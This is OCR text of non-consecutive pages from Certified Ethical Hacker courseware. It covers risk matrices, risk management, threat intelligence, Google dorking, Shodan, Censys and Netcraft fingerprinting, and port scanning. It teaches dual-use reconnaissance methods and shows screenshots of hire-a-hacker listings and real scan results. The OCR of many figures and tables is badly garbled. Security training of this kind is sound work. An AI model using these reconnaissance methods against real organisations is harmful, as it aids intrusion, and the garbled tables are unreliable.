Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
What is Risk?
CE H
@ Risk refers to the degree of uncertainty or expectation that an adverse event may cause damage to the system @ Risks are categorized into different levels accordingto their estimated impact on the system @ A risk matrix is used to scale risk by considering the probability, likelihood, and consequence or impact of the risk Risk Levels
> baad High
Medium
ve!
Risk Matrix Major
Severe
Hig
Extreme
Extreme
coin ae
RS‘i a
High .
Extreme a
|| =
low
Medium
Medium
‘High
RNa tow
low
Medium
Medium
High
Immediate measures should be taken to
> Sameetaie Identify and impose controlsto reduce
81 - 100%
risk toa reasonably low level
= cero ne
> No urgent action is required
> implement controls as soon as possible
Take preventive steps to mitigate the
41-20%
effectsof risk
Cap Probability
Insignificant
Minor
Low
Medium
= igt ed cots, | | Ee o S
=
Probabilty
ow ey
w
ad
lum
Moderate
igh
ledium’
igh
a
it
Note: This is an example ofa risk matrix. Organizations need to create their own risk matrix based on their business needs Al Rights Reserved.
What is Risk? Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions. Alternatively, risk can also be:
=
The probability of the occurrence of a threat or an event that will damage, cause loss to, or have other negative liabilities.
impacts
on the organization,
either from
internal or external
=
The possibility of a threat acting upon an internal or external vulnerability and causing harm to a resource.
=
The product of the likelihood that an event will occur and the impact that the event might have on an information technology asset.
The relation between Risk, Threats, Vulnerabilities, and Impact is as follows: RISK = Threats x Vulnerab
ies x Impact
The impact of an event on an information asset is the product of vulnerability in the asset and the asset’s value to its stakeholders. IT risk can be expanded to
RISK = Threat x Vulnerability x Asset Value In fact, the risk is the combination of the following two factors:
=
The probability of the occurrence of an adverse event
=
The consequence of the adverse event
Module 01 Page 57
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Risk Level Risk level is an assessment of the resulted impact on the network. Various methods exist to differentiate the risk levels depending on the risk frequency and severity. One of the common methods used to classify risks is to develop a two-dimensional matrix. Working out the frequency or probability of an incident happening (likelihood) and its possible consequences is necessary to analyze risks. This is referred to as the level of risk. Risk can be represented and calculated using the following formula: Level of Risk = Consequence x Likelihood Risks are categorized into different levels according to their estimated impact on the system. Primarily, there are four risk levels, which include extreme, high, medium, and low levels. Remember that control measures may decrease the level of a risk, but do not always entirely eliminate the risk. Risk Level | Consequence
Extreme or | Serious or High
Imminent danger
Medium
Moderate danger
Low
Negligible danger
Action >
Immediate measures are required to combat the risk
>
Identify and impose controls to reduce the risk to a reasonably low level
>
Immediate action is not required, but action should be
implement quickly
> | >
Implement controls as soon as possible to reduce the risk to a reasonably low level Take preventive steps to mitigate the effects of risk Table 1.1: Risk Levels
Risk Matrix The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact. It is the graphical representation of risk severity and the extent to which the controls can or will mitigate it. The Risk matrix is one of the simplest processes to use for increased visibility of risk; it contributes to the management’s decision-making capability. The risk matrix defines various levels of risk and categorizes them as the product of negative probability and negative severity. Although there are many standard risk matrices, individual organizations must create their own.
Module 01 Page 58
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Introduction to Ethical Hacking
Insignificant
Minor
Moderate
Major
Severe
81 - 100%
Nan) a Probability
Low
Medium
High
Extreme
Extreme
61-80%
Geo Probability
Low
Medium
Highe
Highe
Extreme
41-60%
Probability
Low
Medium
Medium
High
High
Probability
Low
Low
Medium
Medium
High
Nias) ley
Low
Low
Medium
Medium
High
21-40%
1-20%
Equal Low
Probability
‘.
7
+
5
(i
.,
Table 1.2: Risk Matrix
The above table is the graphical representation of a risk matrix, which is used to visualize and compare risks. It differentiates the two levels of risk and is a simple way of analyzing them. =
Likelihood: The chance of the risk occurring
=
Consequence: The severity of a risk event that occurs
Note: This is an example of a risk matrix. Organizations must create individual risk matrices based on their business needs.
Module 01 Page 59
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Risk Management
CE H
@ Risk management is the process of reducing and maintaining risk at an acceptable level by means of a well-defined and actively employed security program Risk Management Phases
Biskeiientitication:
@
Identifies the sources, causes, consequences, and other details of the internal and external
risks affecting the security of the organization
RISK KGsasement
a Assesses the organization’ risk and provides an estimate ofthe Mahood and impact
Risk Treatment
@ Selects and implements appropriate controls for the identified risks
SS Risk Review
a Ensures approprite contre are implemented tohandle known risks and calculates @ Evaluates the performance of the implemented risk management strategies
Risk Management Risk management is the process of identifying, assessing, responding to, and implementing the activities that control how the organization manages the potential effects of risk. It has a prominent place throughout the security life cycle and is a continuous and ever-increasing complex process. The types of risks vary from organization to organization, but the act of preparing a risk management plan is common to all organizations. Risk Management Objectives =
Identify potential risks—this is the main objective of risk management
=
Identify the impact of risks and help the organization develop better risk management strategies and plans
=
Prioritize the risks, depending on the impact or severity of the risk, and use established risk management methods, tools, and techniques to assist in this task
=
Understand and analyze the risks and report identified risk events.
=
Control the risk and mitigate its effect.
=
Create awareness among the security staff and develop strategies and plans for lasting risk management strategies.
Risk management is a continuous process performed by achieving goals at every phase. It helps reduce and maintain risk at an acceptable level utilizing a well-defined and actively employed security program. This process is applied in all stages of the organization, for example, to specific network locations in both strategic and operational contexts.
Module 01 Page 60
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
The four key steps commonly termed as risk management phases are: =
Risk Identification
=
Risk Assessment
=
Risk Treatment
=
Risk Tracking and Review
Every organization should follow the above steps while performing the risk management process.
=
Risk Identification The initial step of the including the sources, affecting the security of process depends on the another.
=
risk management plan. Its main aim is to identify the risks— causes, and consequences of the internal and external risks the organization before they cause harm. The risk identification skill set of the people, and it differs from one organization to
Risk Assessment This phase assesses the organization’s risks and estimates the likelihood and impact of those risks. Risk assessment is an ongoing iterative process that assigns priorities for risk mitigation and implementation plans, which in turn help to determine the quantitative and qualitative value of risk. Every organization should adopt a risk evaluation process in order to detect, prioritize, and remove risks. The risk assessment determines the kind of risks present, their likelihood and severity, and the priorities and plans for risk control. Organizations perform a risk assessment when they identify a hazard but are not able to control it immediately. A risk assessment is followed by a regular update of all information facilities.
=
Risk Treatment Risk treatment is the process of selecting and implementing appropriate controls on the identified risks in order to modify them. The risk treatment method addresses and treats the risks according to their severity level. Decisions made in this phase are based on the results of a risk assessment. The purpose of this step is to identify treatments for the risks that fall outside the department’s risk tolerance and provide an understanding of the level of risk with controls and treatments. It identifies the priority order in which individual risks should be treated, monitored, and reviewed. The following information is needed before treating the risk: o
The appropriate method of treatment
o
The people responsible for the treatment
o
The costs involved
o
The benefits of treatment
o
The likelihood of success
Module 01 Page 61
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking o =
Exam 312-50 Certified Ethical Hacker
Ways to measure and assess the treatment
Risk Tracking and Review An effective risk management plan requires a tracking and review structure to ensure effective identification and assessment of the risks as well as the use of appropriate controls and responses. The tracking and review process should determine the measures and procedures adopted and ensure that the information gathered to perform the assessment was appropriate. The review phase evaluates the performance of the implemented risk management strategies. Performing regular inspections of policies and standards, as well as regularly reviewing them, helps to identify the opportunities for improvement. Further, the monitoring process ensures that there are appropriate controls in place for the organization’s activities and that all procedures are understood and followed.
Module 01 Page 62
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Cyber Threat Intelligence
CE H Types of Threat Intelligence
© Cyber Threat intelligence (CTI) is definedas the collection and analysisof information aboutthreatsand
adversariesand the
ZN e
@
3
a
drawing‘ of patterns that provide the ability
2
to make knowledgeable decisionsfor reparedness, prevention, preparedness, prevention, and response p
(
High-level information on
ks
hi
.
enanging risks
ga
; Operational
g
Tactical @
& | | © Consumed by high-level pxceutives gHy Managementand
actionsagainst various cyber-attacks
-,
Strategic
Information on attackers’
TIP:
.
© Consumed by T Service ang Soc Managers, ‘Administrators
\
; Technical
3
@ Information on a specific
© Information on specific
to identify and mitigate various businessrisks
=
@ consumed by Security
© Consumed by SOC Staff
threats; it helpsin implementing various
z
© Cyber threat intelligence helps the organization
é
incoming attack
Managers and Network
H
by converting unknown threats into known
advanced and proactive defense strategies
Defenders
\os ]
resource > intranet
Intranet (Staff Only) - Environment, Health & Safety
This page is for EHS Employees and Guests. If you have any questions or comments, send us feedback by using the Admin
Help Desk form.
https://axerosolutions.com > Blog
HR Intranet: 10 Benefits of an Intranet for Human Resources ‘An HR intranet is excellent for sharing typical HR documents, ranging from health insurance documents, scheduling, contact information, and training manuals. By
https:/vww.claromentis.com > intranet-departments > h Human Resources - HR Intranet Software - Claromentis Intranet software for human
resources teams.
Improve information sharing,
processes, and onboard new employees with our HR intranet software.
streamline
https:/thehrcompany.ie » HR Support for Corporations Human Resources Intranet - The HR Company Human Resources Intranet — used properly, it can be a powerful tool for saving time and
reducing costs. A HR intranet is a proper use of new technology.
Figure 2.2: Search engine results for given Google Advance Operator syntax
Module 02 Page 117
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
Google Hacking Database
CE H
|@ The Google Hacking Database (GHDB) is an authoritative source for querying the everwidening reach of the Google search engine @ Attackers use Google dorks in Google advanced search
operators to extract sensitive information about their target,
such as vulnerable servers, error messages, sensitive files, login pages, and websites
Google Hacking Database Source: https://www.exploit-db.com The Google Hacking Database (GHDB) is an authoritative source for querying the ever-widening scope of the Google search engine. In the GHDB, you will find search terms for files containing usernames, vulnerable servers, and even files containing passwords. The Exploit Database is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Using GHDB dorks, attackers can rapidly identify all the publicly available exploits and vulnerabilities of the target organization’s IT infrastructure. Attackers use Google dorks in Google advanced search operators to extract sensitive information about the target, such as vulnerable servers, error messages, sensitive files, login pages, and websites. Google Hacking Database Categories:
=
Footholds
=
Files Containing Juicy Info
=
Files Containing Usernames
=
Files Containing Passwords
=
Sensitive Directories
=
Sensitive Online Shopping Info
=
Web Server Detection
=
Network or Vulnerability Data
=
Vulnerable Files
=
Pages Containing Login Portals
=
Vulnerable Servers
=
Various Online Devices
=
Error Messages
=
Advisories and Vulnerabilities
Module 02 Page 118
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
%% Exploit Database - Exploitsfor? Xe
© Maps
=
Settings +
Anytime + Related Searches
Hire a Professional Hacker - Certified Ethical Hackers
.
Hire Hackers/Shop hacking tools today! Being an organization that's fully committed to solving sveryday problems in the hacking community, we offer all kinds of hacking services. Furthermore, once you've successfully signed up with one of our hackers for any project, we'll
give direct and unlimited access to our online store to shop for
hintsimsienieniniensin iilegal hackers for hire
Ineed a hackers help
© hupsiivwupwork.com » hire > hackers
27 Best Freelance Hackers For Hire In March 2022 - Upwork™
best hackers for hire
Hire the best Hackers. Get to know top Hackers. And say hello to the newest memberof your team. Get Started, Clients rate Hackers. Rating is 47 out of 5. 47/5, based on 1,807 client reviews. $50/hr.
SS ene
oe
hire a hacker for gmail
WH hupsi/iwww.hackerforhire.net
ire X | + at DuckDuckGo @ hackerforh
Hire the #1 Hire a Hacker Cyber Service
find a hacke
We are a US Based Service 3001 W Indian School Rd. Phoenix, AZ 85017. 480-400-4600
>
|
Figure 2.26: Screenshot of Tor Browser
Module 02 Page 151
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
Determining the Operating System |@ SHODAN search engine lets you find connected devices (routers, servers, 1oT, etc.) using a variety of filters
CE H
| Censys search engine provides a full view of every server and device exposedto the Internet
ee
te
=
185.8.175.117
‘tps www sono
tte /oensysio
Determining the Operating System Attackers use various online tools such as Netcraft, Shodan, and Censys to detect the operating system used at the target organization. These tools search the Internet for detecting connected devices such as routers, servers, and loT devices belonging to the target organization. Using these tools, attackers obtain information such as the city, country, latitude/longitude, hostname, operating system, and IP address of the target organization. Such information further helps attackers in identifying potential vulnerabilities and finding effective exploits to perform various attacks on the target.
Module 02 Page 152
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance =
Exam 312-50 Certified Ethical Hacker
Netcraft Source: https://www.netcraft.com The technique of obtaining information about the target network operating system is
called OS fingerprinting. Open https://www.netcraft.com/tools/ in the browser and type
the URL of the target website in the What's that site running? field. Attackers use the Netcraft tool to identify all the sites associated with the target domain along with the operating system running at each site. I
€
Site report for https://www.micrs
>
Xb
C _ @ sitereport.netcraft.com/?url=https%3A%2F%2Fwww.microsoft.com%2F
AMETCRAFT Site report for https://www.microsoft.com > Q Look up another site?
@ Background Site title
Microsoft - Cloud, Computers, Apps & Gaming
Site rank
64
Description
Explore Microsoft products and services for your home or business. Shop Surface, Microsoft 365,
Xbox, Windows, Azure, and more. Find downloads and get support.
Date first seen Netcraft Risk Rating @
p..
English
Domain
microsoft.com
Primary language
& Network Site
hitps://www.microsoft.com Z
Netblock Owner
Akamai International, BV
Hosting company
Akamai Technologies
ns1-205.azure-dns.com
Domain registrar
markmonitor.com
Nameserver lage
Hosting country |
Nameserver
EEE
whois.markmonitor.com nee
Figure 2.27: Screenshot of Netcraft showing results for Microsoft
Module 02 Page 153
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
:
EE Site report for https://www.micre
€
C _
@
Exam 312-50 Certified Ethical Hacker
y
x
sitereport.netcraft.com/?url=https%3A%2F%2Fwww.microsoft.com%2F
er
-
a 8
Netblock owner
IP address
Web server
Last seen
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
184.31.225.172
unknown
—_5-Mar-2022
Akamai
88.221.16.244
unknown
26-Feb-2022
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
184.31.225.172
unknown
19-Feb-2022
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
104.110.245.246
unknown
—_5-Feb-2022
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
184.31.225.172
unknown
28-Jan-2022
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
104.110.245.246
unknown
21-Jan-2022
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
23.47.197.197
unknown
—7-Jan-2022
Akamai Technologies
92.122.165.100
unknown
31-Dec-2021
Akamai Technologies, Inc. 145 Broadway Cambridge MAUS 02142
104.110.245.246
unknown
24-Dec-2021
Akamai Technologies
92.122.165.100
unknown
‘16-Dec-2021
xX 2
Figure 2.28: Screenshot of Netcraft showing target operating system
=
SHODAN Search Engine
Source: https://www.shodan.io Shodan is a computer search engine that searches the Internet for connected devices (routers, servers, and loT.). You can use Shodan to discover which devices are connected to the Internet, where they are located, and who is using them.
It helps attackers to keep track of all the devices on the target network that are directly accessible from the Internet. It also allows the attacker to find devices based on the city, country, latitude/longitude, hostname, operating system, and IP address. Further, it helps the attacker to search for known vulnerabilities and exploits across Exploit DB, Metasploit, CVE, OSVDB, and Packetstorm with a single interface. As shown in the screenshot, attackers use this tool to detect various target devices connected to the Internet along with the operating system used.
Module 02 Page 154
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
govate com
912,502. OUNTRI
View Report
Browse Images
out Shodan Monitor
54.146.208.121 (7
ye Germany
154,763
China
138,153
com ‘Amazon Data ServicesNoVa © Unites States, Ashoum
& SSL Certificate Issued By. |-Commen Name. RS
Korea, Republic of Francess,049°°°4 More...
Diffie-Hellman Fingerprint: RFCS114/2048bit MODP Group with 24-bit Prime Order ‘Subgroup
388,601 340,200 58,404 20,287 12,918
52.54.15.38 7
Synology Disk Station 273,305
HTTP/1.1 481 Unauthorized Date: Tue, @8 Mar 2022 11:03:03 GT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; X-XSS-Protection: 1; modesblock X-Content-Type-Options: nosniff Feature-Policy: microphone ‘none’; camera ‘none’; geolocation
(Organization: Let's Enerypt Issued To: |- Common Name: cthiesandeompliance huntsman.com ‘Supported SSL Versions: TLsv1.2, Tusa
United States84,393
Synology DiskStation Manager (DSM) 6.2.4.25556 Synology Diskstation 99° ‘Manager (OSM) 7.0.1.42218
(0 View on Map
New Service: Keep track of what you have connected to the Internet. Check
5414820 c5omeute
FOP PORTS 5001 5000 443 80 7001 More...
©
5153 comeus'S ~ ‘Amazon Technologies
United States, Ashburn
Q SSL Certificate Issued By: |-Commen Name Ro
(Organization:
HITP/1.1 401 Unauthorized Date: Tue, @8 Mar 2022 11: Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Feature-Policy: microphone ‘none’; camera ‘none’; geolocation
Figure 2.29: Screenshot of SHODAN Search Engine showing target operating system
Module 02 Page 155
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
Censys
Source: https://censys.io Censys monitors the infrastructure and discovers unknown assets anywhere on the Internet. It provides a full view of every server and device exposed to the Internet. Attackers use this tool to monitor the target IT infrastructure to discover various devices connected to the Internet along with their details such as the operating system used, IP address, protocols used, and geographical location.
¢ Censys
ates»
tes8175107
185.8.175.117 s of Mar 8, 2022 6:29am UTC Latest summary fA Explore 3 Histoy @ WHO [Basic information
08 Network Routing Protocols
ie PARVASYSTEM (IR) 185.8.175.0/24 vie AS60631 25/SMTP, §3/DNS, 80/HTTP, 86/HTTP, 110/POPS, 143/IMAP, 366/SMTP , 587/SMTP 1000/HTTP , 1433/MSSQL, 3000/HTTP , 3389/ROP , B595/HTTP, 53413/NETIS
25/SMTP @
served Mar 07,2022 0824p
sora
+
aghdad
ens
BS. ice . ee Geographic Location
Load
Country tran (IR)
EHLO
stan TLs
not avai Figure 2.30: Screenshot of Censys Search Engine showing target operating system
Module 02 Page 156
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
VoIP and VPN Footprinting through SHODAN
=
g
—
C EH
=
Or vl
a
a
= 3 =
.
tte: /fuww shodon io
VoIP and VPN Footprinting through SHODAN Source: https://www.shodan.io Shodan is a search engine that enables attackers to perform footprinting at various levels. It is used to detect devices and networks with vulnerabilities. A search in Shodan for VoIP and VPN footprinting can deliver various results, which will help gather VPN- and VolP-related information.
Module 02 Page 157
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Footprinting and Reconnaissance
Exam 312-50 Certified Ethical Hacker
The following screenshots show some of the VPN and VoIP footprinting search results obtained through Shodan:
44 View Report
257,685
New Service: Keep track of what you have connected to the Internet. Check out Shodan Mon 151.41.130.64
64-130.41-1
Ps
Italy Germany Taiwan
United States
AN tay, Rin
245,224 3838 2.410 939
France
520
181.24.253.246 i
Ppp-24
a Mia Rome—
2768 1,985
80
895
1900 More.
268
WIND TRE S.PA.
Wing Telecomunicazioni spa ni 2894 Wind telecomunicazioony one 5,386
voir D-Link DVS-40885, DVS-
334
agzroot
ag=105965@-+6F01897-
Content-L...
35@6-Babd7 -10961472
rport=2681@;branch-Foo
151.54.247.153 wi
HM ay, Catania
484 Not Found
User-Agent: DLink VoIP Stack Supported: replaces, timer, s0@re1
132,524
WIND Telecomunicazioni SpA 78,722 WINDTRE s.p.a 7,100
From:
tracert Tracing hops:
216.239.36.10
route
to
ns3.google.com
[216.239.36.10]
1
Website, email, Whois, and DNS footprinting > Network footprinting and footprinting through social engineering > Some important footprinting tools > How organizations can defend against footprinting and reconnaissance activities Q Inthe next module, we will discuss in detail how attackers, ethical hackers, and pen testers perform network scanningto collect information about a target of evaluation before an attack or audit
Module Summary This module presented footprinting concepts along with the objectives of footprinting. It provided a detailed explanation of the various techniques used for footprinting through search engines. Further, it described footprinting through web services and social networking sites. In addition, it discussed website and email footprinting techniques. It also explained Whois and DNS footprinting in detail. Moreover, it described network footprinting along with traceroute analysis. It also explained footprinting through social engineering. Finally, it presented an overview of important footprinting tools. The module ended with a detailed discussion of how organizations can defend themselves against footprinting and reconnaissance activities. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform network scanning to collect information about a target for evaluation before an attack or audit.
Module 02 Page 256
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
-
Certified | Ethical
—
EC-Council
Hacker
MODULE 03 SCANNING Li
Ge
HT as
oft d
’
me
q
> F
NETWORKS — v t —T =
.
D)
EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
o
© LO#01: Explain Network Scanning Concepts
OBJECTIVES
LO#05: Demonstrate Various Scanning Techniques for OS Discovery
o
LEARNING
LO#06: Demonstrate Various Techniques for Scanning
@ LO#02: Use Various Network Scanning Tools
Beyond IDS and Firewall
® LO#03: Demonstrate Various Scanning Techniques
for Host Discovery
LO#07: Explain Network Scanning Countermeasures
© LO#04: Demonstrate Various Scanning Techniques for Port and Service Discovery
Learning Objectives After identifying the target and performing the initial reconnaissance, as discussed in the Footprinting and Reconnaissance module, attackers begin to search for an entry point into the target system. Attackers should determine whether the target systems are active or inactive to reduce the time spent on scanning. Notably, the scanning itself is not the actual intrusion but an extended
form
of reconnaissance
in which
the
attacker
learns
more
about
his/her
target,
including information about OSs, services, and any configuration lapses. The information gleaned from such reconnaissance helps the attacker select strategies for attacking the target system or network. This module starts with an overview of network scanning and provides insights into various host discovery techniques that can be used to check for live and active systems. Furthermore, it discusses various port and service discovery techniques, operating system discovery techniques, and techniques for scanning beyond IDS and firewalls. Finally, it ends with an overview of drawing network diagrams.
At the end of this module, you will be able to: =
Describe the network scanning concepts
=
Use various scanning tools
=
Perform host discovery to check for live systems
=
Perform port and service discovery using various scanning techniques
=
Perform operating system (OS) discovery
=
Scan beyond intrusion detection systems (IDS) and firewalls
=
Explain various network scanning countermeasures
Module 03 Page 259
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Explain Network Scanning Concepts
Network Scanning Concepts As already discussed, footprinting is the first phase of hacking, in which the attacker gains primary information about a potential target. He/she then uses this information in the scanning phase to gather more details about the target.
Module 03 Page 260
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Overview of Network Scanning
CE
] ] ‘@ Network scanning refers to a set of procedures ] used for identifying hosts, ports, and services ;| in a network | ‘@
Network scanning is one of the components of
] ] ]
intelligence gathering which can be used by an
Network Scanning Process Sends
TePf probes
attacker to create a profile of the target
|
=
Attacker
organization
© To discover live hosts, IP address, and open ports of live hosts Objectives of
Network
Scanning
©
To discover operating systems and system architecture
@ To discover services running on hosts @
To discover vulnerabilities in live hosts
Overview of Network Scanning Scanning is the process of gathering additional detailed information about the target using highly complex and aggressive reconnaissance techniques. Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. Network scanning is also used for discovering active machines in a network and identifying the OS running on the target machine. It is one of the most important phases of intelligence gathering for an attacker, which enables him/her to create a profile of the target organization. In the process of scanning, the attacker tries to gather information, including the specific IP addresses that can be accessed over the network, the target’s OS and system architecture, and the ports along with their respective services running on each computer. Sends TCP/IP probes
>
|
Gets network information
Attacker
Network Figure 3.1: Network scanning process
The purpose of scanning is to discover exploitable communications channels, probe as many listeners as possible, and track the ones that are responsive or useful to an attacker’s particular needs. In the scanning phase of an attack, the attacker tries to find various ways to intrude into a target system. The attacker also tries to discover more information about the target system to determine the presence of any configuration lapses. The attacker then uses the information obtained to develop an attack strategy.
Module 03 Page 261
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Types of Scanning =
Port Scanning— Lists the open ports and services. Port scanning is the process of checking the services running on the target computer by sending a sequence of messages in an attempt to break in. Port scanning involves connecting to or probing TCP and UDP ports of the target system to determine whether the services are running or are in a listening state. The listening state provides information about the OS and the application currently in use. Sometimes, active services that are listening may allow unauthorized users to misconfigure systems or to run software with vulnerabilities.
=
Network Scanning — Lists the active hosts and IP addresses. Network scanning is a procedure for identifying active hosts on a network, either to attack them or assess the security of the network.
=
Vulnerability Scanning — Shows the presence of known weaknesses. Vulnerability scanning is a method for checking whether a system is exploitable by identifying its vulnerabilities. A vulnerability scanner consists of a scanning engine and a catalog. The catalog includes a list of common files with known vulnerabilities and common exploits for a range of servers. A vulnerability scanner may, for example, look for backup files or directory traversal exploits. The scanning engine maintains logic for reading the exploit list, transferring the request to the web server, and analyzing the requests to ensure the safety of the server. These tools generally target vulnerabilities that secure host configurations can fix easily through updated security patches and a clean web document.
A thief who wants to break into a house looks for access points such as doors and windows. These are usually the house’s points of vulnerability, as they are easily accessible. When it comes to computer systems and networks, ports are the doors and windows of a system that an intruder uses to gain access. A general rule for computer systems is that the greater the number of open ports on a system, the more vulnerable is the system. However, there are cases in which a system with fewer open ports than another machine presents a much higher level of vulnerability. Objectives of Network Scanning The more the information at hand about a target organization, the higher are the chances of knowing a network’s security loopholes, and, consequently, for gaining unauthorized access to it. Some objectives for scanning a network are as follows: =
Discover the network’s live hosts, IP addresses, and open ports of the live hosts. Using the open ports, the attacker will determine the best means of entering into the system.
=
Discover the OS and system architecture of the target. This is also known as fingerprinting. An attacker can formulate an attack strategy based on the OS’s vulnerabilities.
=
Discover the services running/listening on the target system. Doing so gives the attacker an indication of the vulnerabilities (based on the service) that can be exploited for gaining
access to the target system. =
Identify specific applications or versions of a particular service.
Module 03 Page 262
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks =
Exam 312-50 Certified Ethical Hacker
Identify vulnerabilities in any of the network systems. This helps compromise the target system or network through various exploits.
Module 03 Page 263
an
attacker
to
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
TCP Communication Data contained
There will be
should be
transmissions
in the packet
CE H
Resets a
no further
processed
Flags connection
Source Port
Destination Port
$
immediately
‘
Sequence No
URG
FIN
(orgent)
RST
Finish)
PSH
(Push)
Sends all buffered data immediately
A
eset ACK
(Acknowledgement)
Acknowledges the receipt of a packet
Acknowledgement No
offs Res |TCPFlags
sYN
_
demo - NetScanTools® Pro Demo Version Build 7-3-2019 based on version 11.863
-
Click hereto Buy Now! Port Range and Scan Mode Fut connect OrcP PortRange upp Ports Only ser —_} 1 Orer ruts Ports 2 ws OTN San HtfOpen)
Target Hostname oI Address (woe~~—+d«~K (se se TagetTage List when carne Scanig
End 256
‘Scan Complete - 256 ports scanned in 5 sec.
Scan Range ofPorts _| NetorkIntrface
Sean Commen Ports Edit Common Ports Uist Edt Target ust
OreP custom Sean
x
Manual Tools- Port Scanner @ 7s umpTe Automated A ports
(Dade to Favorites
Ethernet (10. 10.1.11) - Microsoft Hyper-V Network Adapter show Al Scanned Pert Resuits sho mmmacy ©) Show UDP Summary ‘TCP Full Connect Response Summary
Stop
9
ne
@ 2 reve 10 pons 5
Setinos Defauts Connect Timeout
@2emasm P @ on reres-tenean
pa
IP Addzess 10.10.1.22 10.10.1.22 10.10.1.22 10.10.1.22 10.10.1.22
Port Dese domain neep Kerberos epmap netbios-ssn
Protocel Tce TCP TCP TOR TCP
Results Data Received Port Active Port Active Port Active Port Active Port Active
Packet Level Tools Application Info
Figure 3.11: Screenshot of NetScanTools Pro
Some additional scanning tools are listed below:
=
sx (https://github.com)
=
Unicornscan (https://sourceforge.net)
=
SolarWinds Port Scanner (https://www.solarwinds.com)
=
PRTG Network Monitor (https://www.paessler.com)
=
OmniPeek Network Protocol Analyzer (https://www.savvius.com)
Module 03 Page 278
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Scanning Networks
Exam 312-50 Certified Ethical Hacker
Scanning Tools for Mobile =
IP Scanner
Source: https://10base-t.com IP Scanner for iOS scans your local area network to determine the identity of all its active machines and Internet devices. It allows attackers to perform network scanning activities along with ping and port scans. Carrier
3:03 PM.
